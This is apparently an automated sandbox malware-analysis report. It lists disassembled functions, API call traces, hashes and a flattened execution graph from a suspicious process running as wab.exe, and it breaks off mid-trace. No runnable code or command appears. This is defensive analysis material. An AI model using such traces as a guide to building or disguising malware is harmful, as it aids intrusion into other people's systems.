                                • _free.LIBCMT ref: 21CB5BDB
                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB5BE8
                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21CB5BF1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 44410da7d9e0d2982edc8dee7e94003b5cc5001190a4158f5a73a6ad080da4b5
                                • Instruction ID: 35dd8f40069e8bebf1cab597fec427ab891ab05f36b0861a3b2a81b96b6b88dc
                                • Opcode Fuzzy Hash: 44410da7d9e0d2982edc8dee7e94003b5cc5001190a4158f5a73a6ad080da4b5
                                • Instruction Fuzzy Hash: 6401287E285702EF970726756C88D1F2A6DDBE66B47100028F816E2581EE79CF024A64
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,?,?,21CB10DF,?,?,?,00000000), ref: 21CB1E9A
                                • lstrcatW.KERNEL32(?,?), ref: 21CB1EAC
                                • lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EB3
                                • lstrlenW.KERNEL32(?,?,21CB10DF,?,?,?,00000000), ref: 21CB1EC8
                                • lstrcatW.KERNEL32(?,21CB10DF), ref: 21CB1ED3
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: lstrlen$lstrcat
                                • String ID:
                                • API String ID: 493641738-0
                                • Opcode ID: 7109d8a9d37ab26c99dacfd214873597273cfe82b3d5430fc1daccd05728f1f9
                                • Instruction ID: 1e8a5dfcb0dfafb215353d12986dbe54800bc80b5b0be6d7467e8e4e60fdfa78
                                • Opcode Fuzzy Hash: 7109d8a9d37ab26c99dacfd214873597273cfe82b3d5430fc1daccd05728f1f9
                                • Instruction Fuzzy Hash: F8F0892A140114BAE6252759BC89E7F7B7CEFD6B64B04001DF608C31909B55594293B5
                                APIs
                                • _free.LIBCMT ref: 21CB91D0
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB91E2
                                • _free.LIBCMT ref: 21CB91F4
                                • _free.LIBCMT ref: 21CB9206
                                • _free.LIBCMT ref: 21CB9218
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 6b0406203d2fd456b0290bc81c4bc2d66eb0767c9004dc4c4cceb0434cd8d9b1
                                • Instruction ID: 838e2de9e1bcc74468722e80e3bf6dbe519122c14b34cde1e562ee5737715a3c
                                • Opcode Fuzzy Hash: 6b0406203d2fd456b0290bc81c4bc2d66eb0767c9004dc4c4cceb0434cd8d9b1
                                • Instruction Fuzzy Hash: 52F062B96A4250DF9614DF54E6C8C077FE9EB25310750180DF90AE7500CB38FE808B54
                                APIs
                                • _free.LIBCMT ref: 21CB536F
                                  • Part of subcall function 21CB571E: HeapFree.KERNEL32(00000000,00000000,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?), ref: 21CB5734
                                  • Part of subcall function 21CB571E: GetLastError.KERNEL32(?,?,21CB924F,?,00000000,?,00000000,?,21CB9276,?,00000007,?,?,21CB7E5A,?,?), ref: 21CB5746
                                • _free.LIBCMT ref: 21CB5381
                                • _free.LIBCMT ref: 21CB5394
                                • _free.LIBCMT ref: 21CB53A5
                                • _free.LIBCMT ref: 21CB53B6
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 98f054f01390b2b529302909cec859e6cb399d4b0a51e999f09b93fac0636e2d
                                • Instruction ID: 6a02750b0e1e914795a95dc3c67e6ec3fc4ecc0aff352adaee0a531434b6640c
                                • Opcode Fuzzy Hash: 98f054f01390b2b529302909cec859e6cb399d4b0a51e999f09b93fac0636e2d
                                • Instruction Fuzzy Hash: FCF05EBCAF5122DF86019F64A98C44E3FB1B73AB20301554AF853E3360DB3D0E028B89
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 21CB4C1D
                                • _free.LIBCMT ref: 21CB4CE8
                                • _free.LIBCMT ref: 21CB4CF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _free$FileModuleName
                                • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                • API String ID: 2506810119-3377118234
                                • Opcode ID: 19948453884b037ed392c46c6066d6c3f1b2c722aa8e29e010b8c4d4b7a64cc8
                                • Instruction ID: 0c385665e1d04650a78067505df63012a103827a406b2402798fe6bd447b3d81
                                • Opcode Fuzzy Hash: 19948453884b037ed392c46c6066d6c3f1b2c722aa8e29e010b8c4d4b7a64cc8
                                • Instruction Fuzzy Hash: FA31A379A48219EFDB11DF99D884D9EBBFCEBA6710F10409AE906D7200D7718F41CB91
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,21CB6FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 21CB8731
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 21CB87BA
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 21CB87CC
                                • __freea.LIBCMT ref: 21CB87D5
                                  • Part of subcall function 21CB56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21CB5702
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                • String ID:
                                • API String ID: 2652629310-0
                                • Opcode ID: f9ca47580551cf4e3a52e3397537b252ca7bca6916c176a6b1579ede1ddfc4c2
                                • Instruction ID: 1282934926b36d275cbd667aba9b07fe3e70978802c3c32414d2b02e6c3348a7
                                • Opcode Fuzzy Hash: f9ca47580551cf4e3a52e3397537b252ca7bca6916c176a6b1579ede1ddfc4c2
                                • Instruction Fuzzy Hash: 5231CD7AA0021AEFEF158F64CC84EAF3BA9EB55314F100168FD04E7190E735DA60CBA0
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,21CB1D66,00000000,00000000,?,21CB5C88,21CB1D66,00000000,00000000,00000000,?,21CB5E85,00000006,FlsSetValue), ref: 21CB5D13
                                • GetLastError.KERNEL32(?,21CB5C88,21CB1D66,00000000,00000000,00000000,?,21CB5E85,00000006,FlsSetValue,21CBE190,FlsSetValue,00000000,00000364,?,21CB5BC8), ref: 21CB5D1F
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,21CB5C88,21CB1D66,00000000,00000000,00000000,?,21CB5E85,00000006,FlsSetValue,21CBE190,FlsSetValue,00000000), ref: 21CB5D2D
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 23e1b1708d464244a659e4cf006165a94a5c5c5a0f8428db1f60f2177a594c04
                                • Instruction ID: 04c995373f3f375dd0ccf28a625c8732b4732b8b0d1551db036397749dafc643
                                • Opcode Fuzzy Hash: 23e1b1708d464244a659e4cf006165a94a5c5c5a0f8428db1f60f2177a594c04
                                • Instruction Fuzzy Hash: E301F73E645222EBC3164A79AC4CE573B5CAF166E57100724FA0AD7180D725DB03CBE1
                                APIs
                                • _free.LIBCMT ref: 21CB655C
                                  • Part of subcall function 21CB62BC: IsProcessorFeaturePresent.KERNEL32(00000017,21CB62AB,00000000,?,?,?,?,00000016,?,?,21CB62B8,00000000,00000000,00000000,00000000,00000000), ref: 21CB62BE
                                  • Part of subcall function 21CB62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 21CB62E0
                                  • Part of subcall function 21CB62BC: TerminateProcess.KERNEL32(00000000), ref: 21CB62E7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                • String ID: *?$.
                                • API String ID: 2667617558-3972193922
                                • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                • Instruction ID: d120f23bdb77a190c8aad443939a06b9b3bc3e528bf1884eba582b126c011226
                                • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                • Instruction Fuzzy Hash: 9F51B279E0022AEFDB05DFA8C880AADBBF5FF59314F248169D454E7344E6359B058B90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: _strlen
                                • String ID: : $Se.
                                • API String ID: 4218353326-4089948878
                                • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                • Instruction ID: c83eb5dc4f6a94026b6ef68905611a0e8765606a4d877dafad30926977ff6b93
                                • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                • Instruction Fuzzy Hash: 4C11E379904289AECB11CFA8E880BDEFBFCAF29314F10405AE545E7212E6705B06CB65
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 21CB2903
                                  • Part of subcall function 21CB35D2: RaiseException.KERNEL32(?,?,?,21CB2925,00000000,00000000,00000000,?,?,?,?,?,21CB2925,?,21CC21B8), ref: 21CB3632
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 21CB2920
                                Strings
                                Memory Dump Source
                                • Source File: 0000000B.00000002.3437008210.0000000021CB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21CB0000, based on PE: true
                                • Associated: 0000000B.00000002.3436979187.0000000021CB0000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 0000000B.00000002.3437008210.0000000021CC6000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_21cb0000_wab.jbxd
                                Similarity
                                • API ID: Exception@8Throw$ExceptionRaise
                                • String ID: Unknown exception
                                • API String ID: 3476068407-410509341
                                • Opcode ID: b86ff3ea560222d7ac9be9fd5c1eaf17f2ce193762b83e5c5b20e82a2fa89287
                                • Instruction ID: 8a77837ab195007e1a5cf01d9a3c8bcaa18e0d167b0933283485568214a53a90
                                • Opcode Fuzzy Hash: b86ff3ea560222d7ac9be9fd5c1eaf17f2ce193762b83e5c5b20e82a2fa89287
                                • Instruction Fuzzy Hash: 8EF0A43D90420EFB8B04AAA6EC44DAA776C9B21760B504174BA14E6098EB32FF15C5C1

                                Execution Graph

                                Execution Coverage: 6.1%
                                Dynamic/Decrypted Code Coverage: 9.2%
                                Signature Coverage: 2.3%
                                Total number of Nodes: 2000
                                Total number of Limit Nodes: 75
38042 409a20 memcpy 38040->38042 38041->38039 38042->38041 38044 40a9e7 38043->38044 38045 40a9dc ??3@YAXPAX 38043->38045 38046 4099f4 3 API calls 38044->38046 38047 40a9f2 38045->38047 38046->38047 38047->37950 38072 409bca GetModuleFileNameW 38048->38072 38050 40dce6 wcsrchr 38051 40dcf5 38050->38051 38052 40dcf9 wcscat 38050->38052 38051->38052 38052->37958 38073 44db70 38053->38073 38055 40dbb4 memset memset 38075 409bca GetModuleFileNameW 38055->38075 38057 40dbfd 38076 4447d9 38057->38076 38060 40dc34 wcscpy wcscpy 38102 40d6f5 38060->38102 38061 40dc1f wcscpy 38061->38060 38064 40d6f5 3 API calls 38065 40dc73 38064->38065 38066 40d6f5 3 API calls 38065->38066 38067 40dc89 38066->38067 38068 40d6f5 3 API calls 38067->38068 38069 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38068->38069 38108 40da80 38069->38108 38072->38050 38074 44db77 38073->38074 38074->38055 38074->38074 38075->38057 38077 4447f4 38076->38077 38078 40dc1b 38077->38078 38079 444807 ??2@YAPAXI 38077->38079 38078->38060 38078->38061 38080 44481f 38079->38080 38081 444873 _snwprintf 38080->38081 38082 4448ab wcscpy 38080->38082 38115 44474a 8 API calls 38081->38115 38084 4448bb 38082->38084 38116 44474a 8 API calls 38084->38116 38085 4448a7 38085->38082 38085->38084 38087 4448cd 38117 44474a 8 API calls 38087->38117 38089 4448e2 38118 44474a 8 API calls 38089->38118 38091 4448f7 38119 44474a 8 API calls 38091->38119 38093 44490c 38120 44474a 8 API calls 38093->38120 38095 444921 38121 44474a 8 API calls 38095->38121 38097 444936 38122 44474a 8 API calls 38097->38122 38099 44494b 38123 44474a 8 API calls 38099->38123 38101 444960 ??3@YAXPAX 38101->38078 38103 44db70 38102->38103 38104 40d702 memset GetPrivateProfileStringW 38103->38104 38105 40d752 38104->38105 38106 40d75c WritePrivateProfileStringW 38104->38106 38105->38106 38107 40d758 38105->38107 38106->38107 38107->38064 38109 44db70 38108->38109 38110 40da8d memset 38109->38110 38111 40daac LoadStringW 38110->38111 38112 40dac6 
38111->38112 38112->38111 38114 40dade 38112->38114 38124 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38112->38124 38114->37887 38115->38085 38116->38087 38117->38089 38118->38091 38119->38093 38120->38095 38121->38097 38122->38099 38123->38101 38124->38112 38135 409b98 GetFileAttributesW 38125->38135 38127 40daea 38128 40db63 38127->38128 38129 40daef wcscpy wcscpy GetPrivateProfileIntW 38127->38129 38128->37888 38136 40d65d GetPrivateProfileStringW 38129->38136 38131 40db3e 38137 40d65d GetPrivateProfileStringW 38131->38137 38133 40db4f 38138 40d65d GetPrivateProfileStringW 38133->38138 38135->38127 38136->38131 38137->38133 38138->38128 38174 40eaff 38139->38174 38143 411ae2 memset 38142->38143 38144 411b8f 38142->38144 38214 409bca GetModuleFileNameW 38143->38214 38156 411a8b 38144->38156 38146 411b0a wcsrchr 38147 411b22 wcscat 38146->38147 38148 411b1f 38146->38148 38215 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38147->38215 38148->38147 38150 411b67 38216 402afb 38150->38216 38154 411b7f 38272 40ea13 SendMessageW memset SendMessageW 38154->38272 38157 402afb 27 API calls 38156->38157 38158 411ac0 38157->38158 38159 4110dc 38158->38159 38160 41113e 38159->38160 38165 4110f0 38159->38165 38297 40969c LoadCursorW SetCursor 38160->38297 38162 411143 38298 4032b4 38162->38298 38316 444a54 38162->38316 38163 4110f7 _wcsicmp 38163->38165 38164 411157 38166 40ada2 _wcsicmp 38164->38166 38165->38160 38165->38163 38319 410c46 10 API calls 38165->38319 38169 411167 38166->38169 38167 4111af 38169->38167 38170 4111a6 qsort 38169->38170 38170->38167 38173->37970 38175 40eb10 38174->38175 38187 40e8e0 38175->38187 38178 40eb6c memcpy memcpy 38179 40ebb7 38178->38179 38179->38178 38180 40ebf2 ??2@YAPAXI ??2@YAPAXI 38179->38180 38184 40d134 16 API calls 38179->38184 38181 40ec2e ??2@YAPAXI 38180->38181 38183 40ec65 38180->38183 38181->38183 38197 40ea7f 38183->38197 38184->38179 38186 402f49 38186->37970 38188 40e8f2 38187->38188 
38189 40e8eb ??3@YAXPAX 38187->38189 38190 40e900 38188->38190 38191 40e8f9 ??3@YAXPAX 38188->38191 38189->38188 38192 40e911 38190->38192 38193 40e90a ??3@YAXPAX 38190->38193 38191->38190 38194 40e931 ??2@YAPAXI ??2@YAPAXI 38192->38194 38195 40e921 ??3@YAXPAX 38192->38195 38196 40e92a ??3@YAXPAX 38192->38196 38193->38192 38194->38178 38195->38196 38196->38194 38198 40aa04 ??3@YAXPAX 38197->38198 38199 40ea88 38198->38199 38200 40aa04 ??3@YAXPAX 38199->38200 38201 40ea90 38200->38201 38202 40aa04 ??3@YAXPAX 38201->38202 38203 40ea98 38202->38203 38204 40aa04 ??3@YAXPAX 38203->38204 38205 40eaa0 38204->38205 38206 40a9ce 4 API calls 38205->38206 38207 40eab3 38206->38207 38208 40a9ce 4 API calls 38207->38208 38209 40eabd 38208->38209 38210 40a9ce 4 API calls 38209->38210 38211 40eac7 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40ead1 38212->38213 38213->38186 38214->38146 38215->38150 38273 40b2cc 38216->38273 38218 402b0a 38219 40b2cc 27 API calls 38218->38219 38220 402b23 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402b3a 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402b54 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402b6b 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b82 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b99 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402bb0 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402bc7 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402bde 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bf5 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402c0c 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402c23 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402c3a 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c51 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c68 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c7f 38249->38250 38251 
40b2cc 27 API calls 38250->38251 38252 402c99 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402cb3 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402cd5 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402cf0 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402d0b 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402d26 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402d3e 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d59 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d78 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d93 38269->38270 38271 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38270->38271 38271->38154 38272->38144 38276 40b58d 38273->38276 38275 40b2d1 38275->38218 38277 40b5a4 GetModuleHandleW FindResourceW 38276->38277 38278 40b62e 38276->38278 38279 40b5c2 LoadResource 38277->38279 38281 40b5e7 38277->38281 38278->38275 38280 40b5d0 SizeofResource LockResource 38279->38280 38279->38281 38280->38281 38281->38278 38289 40afcf 38281->38289 38283 40b608 memcpy 38292 40b4d3 memcpy 38283->38292 38285 40b61e 38293 40b3c1 18 API calls 38285->38293 38287 40b626 38294 40b04b 38287->38294 38290 40b04b ??3@YAXPAX 38289->38290 38291 40afd7 ??2@YAPAXI 38290->38291 38291->38283 38292->38285 38293->38287 38295 40b051 ??3@YAXPAX 38294->38295 38296 40b05f 38294->38296 38295->38296 38296->38278 38297->38162 38299 4032c4 38298->38299 38300 40b633 ??3@YAXPAX 38299->38300 38301 403316 38300->38301 38320 44553b 38301->38320 38305 403480 38516 40368c 15 API calls 38305->38516 38307 403489 38308 40b633 ??3@YAXPAX 38307->38308 38309 403495 38308->38309 38309->38164 38310 4033a9 memset memcpy 38311 4033ec wcscmp 38310->38311 38312 40333c 38310->38312 38311->38312 38312->38305 38312->38310 38312->38311 38514 4028e7 11 API calls 38312->38514 38515 40f508 6 API calls 38312->38515 38314 403421 _wcsicmp 38314->38312 38317 444a64 FreeLibrary 
38316->38317 38318 444a83 38316->38318 38317->38318 38318->38164 38319->38165 38321 445548 38320->38321 38322 445599 38321->38322 38517 40c768 38321->38517 38323 4455a8 memset 38322->38323 38330 4457f2 38322->38330 38600 403988 38323->38600 38334 445854 38330->38334 38702 403e2d memset memset memset memset memset 38330->38702 38331 445672 38611 403fbe memset memset memset memset memset 38331->38611 38332 4458bb memset memset 38337 414c2e 16 API calls 38332->38337 38380 4458aa 38334->38380 38725 403c9c memset memset memset memset memset 38334->38725 38335 44595e memset memset 38340 414c2e 16 API calls 38335->38340 38336 4455e5 38336->38331 38343 44560f 38336->38343 38341 4458f9 38337->38341 38339 445a00 memset memset 38748 414c2e 38339->38748 38351 44599c 38340->38351 38352 40b2cc 27 API calls 38341->38352 38355 4087b3 338 API calls 38343->38355 38344 44557a 38377 44558c 38344->38377 38797 41366b FreeLibrary 38344->38797 38345 445849 38812 40b1ab ??3@YAXPAX ??3@YAXPAX 38345->38812 38346 445bca 38353 445c8b memset memset 38346->38353 38419 445cf0 38346->38419 38347 445b38 memset memset memset 38357 445bd4 38347->38357 38358 445b98 38347->38358 38361 40b2cc 27 API calls 38351->38361 38354 445909 38352->38354 38365 414c2e 16 API calls 38353->38365 38362 409d1f 6 API calls 38354->38362 38363 445621 38355->38363 38356 44589f 38813 40b1ab ??3@YAXPAX ??3@YAXPAX 38356->38813 38371 414c2e 16 API calls 38357->38371 38358->38357 38367 445ba2 38358->38367 38364 4459ac 38361->38364 38373 445919 38362->38373 38798 4454bf 20 API calls 38363->38798 38375 409d1f 6 API calls 38364->38375 38376 445cc9 38365->38376 38885 4099c6 wcslen 38367->38885 38368 4456b2 38800 40b1ab ??3@YAXPAX ??3@YAXPAX 38368->38800 38370 40b2cc 27 API calls 38381 445a4f 38370->38381 38383 445be2 38371->38383 38372 403335 38513 4452e5 45 API calls 38372->38513 38814 409b98 GetFileAttributesW 38373->38814 38374 445823 38374->38345 38387 4087b3 338 API calls 38374->38387 38389 4459bc 38375->38389 38390 409d1f 6 
API calls 38376->38390 38584 444b06 38377->38584 38378 445879 38378->38356 38400 4087b3 338 API calls 38378->38400 38380->38332 38405 44594a 38380->38405 38763 409d1f wcslen wcslen 38381->38763 38394 40b2cc 27 API calls 38383->38394 38384 445d3d 38404 40b2cc 27 API calls 38384->38404 38385 445d88 memset memset memset 38388 414c2e 16 API calls 38385->38388 38387->38374 38397 445dde 38388->38397 38881 409b98 GetFileAttributesW 38389->38881 38399 445ce1 38390->38399 38391 445bb3 38888 445403 memset 38391->38888 38392 445680 38392->38368 38634 4087b3 memset 38392->38634 38403 445bf3 38394->38403 38395 445928 38395->38405 38815 40b6ef 38395->38815 38406 40b2cc 27 API calls 38397->38406 38905 409b98 GetFileAttributesW 38399->38905 38400->38378 38412 409d1f 6 API calls 38403->38412 38414 445d54 _wcsicmp 38404->38414 38405->38335 38418 4459ed 38405->38418 38417 445def 38406->38417 38407 4459cb 38407->38418 38428 40b6ef 253 API calls 38407->38428 38411 40b2cc 27 API calls 38421 445a94 38411->38421 38413 445c07 38412->38413 38424 445389 259 API calls 38413->38424 38425 445d71 38414->38425 38491 445d67 38414->38491 38416 445665 38799 40b1ab ??3@YAXPAX ??3@YAXPAX 38416->38799 38426 409d1f 6 API calls 38417->38426 38418->38339 38461 445b22 38418->38461 38419->38372 38419->38384 38419->38385 38420 445389 259 API calls 38420->38346 38768 40ae18 38421->38768 38422 44566d 38422->38330 38685 413d4c 38422->38685 38431 445c17 38424->38431 38906 445093 23 API calls 38425->38906 38434 445e03 38426->38434 38428->38418 38430 4456d8 38435 40b2cc 27 API calls 38430->38435 38436 40b2cc 27 API calls 38431->38436 38433 44563c 38433->38416 38438 4087b3 338 API calls 38433->38438 38907 409b98 GetFileAttributesW 38434->38907 38441 4456e2 38435->38441 38442 445c23 38436->38442 38437 445d83 38437->38372 38438->38433 38440 40b6ef 253 API calls 38440->38372 38801 413fa6 _wcsicmp _wcsicmp 38441->38801 38446 409d1f 6 API calls 38442->38446 38444 445e12 38451 445e6b 38444->38451 38457 40b2cc 27 API 
calls 38444->38457 38449 445c37 38446->38449 38447 445aa1 38450 445b17 38447->38450 38465 445ab2 memset 38447->38465 38479 409d1f 6 API calls 38447->38479 38775 40add4 38447->38775 38780 445389 38447->38780 38789 40ae51 38447->38789 38448 4456eb 38453 4456fd memset memset memset memset 38448->38453 38454 4457ea 38448->38454 38455 445389 259 API calls 38449->38455 38882 40aebe 38450->38882 38909 445093 23 API calls 38451->38909 38802 409c70 wcscpy wcsrchr 38453->38802 38805 413d29 38454->38805 38460 445c47 38455->38460 38462 445e33 38457->38462 38467 40b2cc 27 API calls 38460->38467 38461->38346 38461->38347 38468 409d1f 6 API calls 38462->38468 38464 445e7e 38469 445f67 38464->38469 38470 40b2cc 27 API calls 38465->38470 38472 445c53 38467->38472 38473 445e47 38468->38473 38474 40b2cc 27 API calls 38469->38474 38470->38447 38471 409c70 2 API calls 38475 44577e 38471->38475 38476 409d1f 6 API calls 38472->38476 38908 409b98 GetFileAttributesW 38473->38908 38478 445f73 38474->38478 38480 409c70 2 API calls 38475->38480 38481 445c67 38476->38481 38483 409d1f 6 API calls 38478->38483 38479->38447 38484 44578d 38480->38484 38485 445389 259 API calls 38481->38485 38482 445e56 38482->38451 38488 445e83 memset 38482->38488 38486 445f87 38483->38486 38484->38454 38490 40b2cc 27 API calls 38484->38490 38485->38346 38912 409b98 GetFileAttributesW 38486->38912 38492 40b2cc 27 API calls 38488->38492 38494 4457a8 38490->38494 38491->38372 38491->38440 38493 445eab 38492->38493 38495 409d1f 6 API calls 38493->38495 38496 409d1f 6 API calls 38494->38496 38497 445ebf 38495->38497 38498 4457b8 38496->38498 38499 40ae18 9 API calls 38497->38499 38804 409b98 GetFileAttributesW 38498->38804 38509 445ef5 38499->38509 38501 4457c7 38501->38454 38503 4087b3 338 API calls 38501->38503 38502 40ae51 9 API calls 38502->38509 38503->38454 38504 445f5c 38506 40aebe FindClose 38504->38506 38505 40add4 2 API calls 38505->38509 38506->38469 38507 40b2cc 27 API calls 38507->38509 38508 409d1f 6 API 
